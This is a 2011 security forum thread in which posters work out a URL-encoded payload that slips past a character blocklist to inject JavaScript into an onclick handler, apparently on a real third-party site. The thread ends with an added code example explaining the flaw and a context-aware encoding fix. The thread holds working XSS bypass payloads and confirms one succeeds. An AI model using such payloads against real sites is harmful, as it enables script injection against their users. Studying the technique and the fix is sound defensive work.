Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 10:35AM

Hey All,

Saw this across the tubes:

javascript:window.location.href='some.page?param1=value&param2=[user-content-here]';

Outside of alphanum, these are allowed: ', ./_%@-^\r\n?&

And these are removed: +=;(){}[]#$"`*\

So, I can add parameters and values via URL encoding. I can escape the string but I'm clueless what to do without parentheses or the equal sign. (This is normal since I'm clueless in general.) And I really don't see a vector to do much else. Do you? If so, wanna clue me in? :-)

Re: XSS in JavaScript context, Filtered
Posted by: LeverOne
Date: February 11, 2011 11:00AM

'&&'javascript:%61%6C%65%72%74%28%31%29//

If -->:<-- is not filtered.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/11/2011 11:02AM by LeverOne.

Re: XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 11:41AM

Thanks for the reply LeverOne!

I apologize, forgot to state that when an ampersand is passed in via a POST as %26, it's returned as &amp; in the context. And, yes, forgot to state that colon : is allowed through. But, the parentheses will get filtered out. I tried double URL encoding (%2528) but that just shows up as %28 in the context.

And the last thing I forgot was this JavaScript context was in an onclick event in a Cancel button:

<input type="button" id="" class="someclass" value="Cancel" onclick="javascript:window...">

So, using this:
'%26%26javascript:alert%25281%2529//

Returned this:
<input ... onclick="javascript:window.location.href='...'&amp;&amp;javascript:alert%281%29//';">

Re: XSS in JavaScript context, Filtered
Posted by: LeverOne
Date: February 11, 2011 12:00PM

// Returned this:
<input ... onclick="javascript:window.location.href='...'&amp;&amp;javascript:alert%281%29//';">


That should work! You missed a quote.

'%26%26'javascript:alert%25281%2529//

Should return:

<input ... onclick="javascript:window.location.href='...'&amp;&amp;'javascript:alert%281%29//';">



// I owe you a beverage...

Maybe one day, thanks. :)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/11/2011 02:24PM by LeverOne.

Re: XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 12:29PM

And it does! I owe you a beverage of your choosing :-)

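The mechanism discussed in this thread, as an added example (not code from the thread or from sla.ckers.org): it models the character blocklist cykyc described and the & to &amp; attribute encoding visible in the returned markup, then shows the fix a defender would apply, encoding for the JavaScript string context (\xHH escapes for everything outside [A-Za-z0-9]) before HTML-attribute encoding. The page template, the function names and the small string-literal decoder are assumptions made for illustration; the sample input is the thread's own payload after the server URL-decodes it.

```javascript
// Added example: models the thread's blocklist filter and attribute encoding,
// then a context-aware encoder as the fix. Template and names are assumptions.

// Characters the original poster says the filter removes.
const BLOCKED = new Set('+=;(){}[]#$"`*\\');

// The blocklist filter as described in the thread: drop blocked characters,
// let everything else (including ' : / & %) through untouched.
function blocklistFilter(input) {
  return Array.from(input).filter((ch) => !BLOCKED.has(ch)).join('');
}

// The fix, innermost context first: every character outside [A-Za-z0-9]
// becomes a \xHH or \u{...} escape, so user data can neither close the JS
// string literal nor start a // comment.
function jsStringEscape(input) {
  let out = '';
  for (const ch of input) {
    const code = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (code < 0x100) out += '\\x' + code.toString(16).padStart(2, '0');
    else out += '\\u{' + code.toString(16) + '}';
  }
  return out;
}

// Outer context: a double-quoted HTML attribute. This is the encoding visible
// in the thread's output (& became &amp;); it protects the HTML layer only.
function htmlAttrEncode(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return input.replace(/[&<>"]/g, (c) => map[c]);
}

// What the browser does before the JS engine runs: decode entities. &amp; is
// handled last so that &amp;lt; decodes to &lt; and not to <.
function htmlAttrDecode(input) {
  return input
    .replace(/&#x([0-9a-fA-F]+);/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&quot;/g, '"').replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Assumed server template: user data lands inside a single-quoted JS string
// literal in onclick; `sanitize` is the treatment applied to that data.
function buildOnclick(userValue, sanitize) {
  const js = "javascript:window.location.href='some.page?param1=value&param2=" +
    sanitize(userValue) + "';";
  return htmlAttrEncode(js);
}

// Small decoder for a single-quoted JS string literal starting at src[start]
// (enough escape forms for this demo, not a full ECMAScript lexer). Returns
// the decoded value and the index just past the closing quote (-1 if none).
function readSingleQuotedLiteral(src, start) {
  let value = '';
  let i = start + 1;
  while (i < src.length) {
    const ch = src[i];
    if (ch === "'") return { value, end: i + 1 };
    if (ch !== '\\') { value += ch; i += 1; continue; }
    const next = src[i + 1];
    if (next === 'x') {
      value += String.fromCharCode(parseInt(src.substr(i + 2, 2), 16)); i += 4;
    } else if (next === 'u' && src[i + 2] === '{') {
      const close = src.indexOf('}', i);
      value += String.fromCodePoint(parseInt(src.slice(i + 3, close), 16)); i = close + 1;
    } else if (next === 'u') {
      value += String.fromCharCode(parseInt(src.substr(i + 2, 4), 16)); i += 6;
    } else {
      value += next; i += 2;   // \' \\ \/ and similar single-character escapes
    }
  }
  return { value, end: -1 };
}

// Reconstruct what the JS engine sees: decode the attribute, read the href
// literal, and report the param2 data it holds plus any source left over
// after the literal. Leftover source other than ';' is user-controlled code.
function analyzeOnclick(attrValue) {
  const js = htmlAttrDecode(attrValue);
  const start = js.indexOf("href='") + 'href='.length;
  const lit = readSingleQuotedLiteral(js, start);
  const marker = 'param2=';
  const data = lit.value.slice(lit.value.indexOf(marker) + marker.length);
  const trailing = lit.end === -1 ? null : js.slice(lit.end);
  return { data, trailing };
}

// Constructed input: the thread's payload after the server URL-decodes it.
const SAMPLE = "'&&'javascript:alert%281%29//";
console.log('blocklist filter :', analyzeOnclick(buildOnclick(SAMPLE, blocklistFilter)));
console.log('js-string escape :', analyzeOnclick(buildOnclick(SAMPLE, jsStringEscape)));
```

With the blocklist, the literal closes at the first apostrophe and everything after it is left as JavaScript source for the engine to run, which is exactly the shape of the returned markup in the thread. With the context-aware encoder, the decoded literal contains the whole input as data and the only source after it is the template's own semicolon. The general lesson is that a blocklist cannot be complete for a nested context (HTML attribute around a JS string literal); encode for each layer, innermost first, or better, keep user data out of event-handler attributes entirely and read it from a data attribute instead.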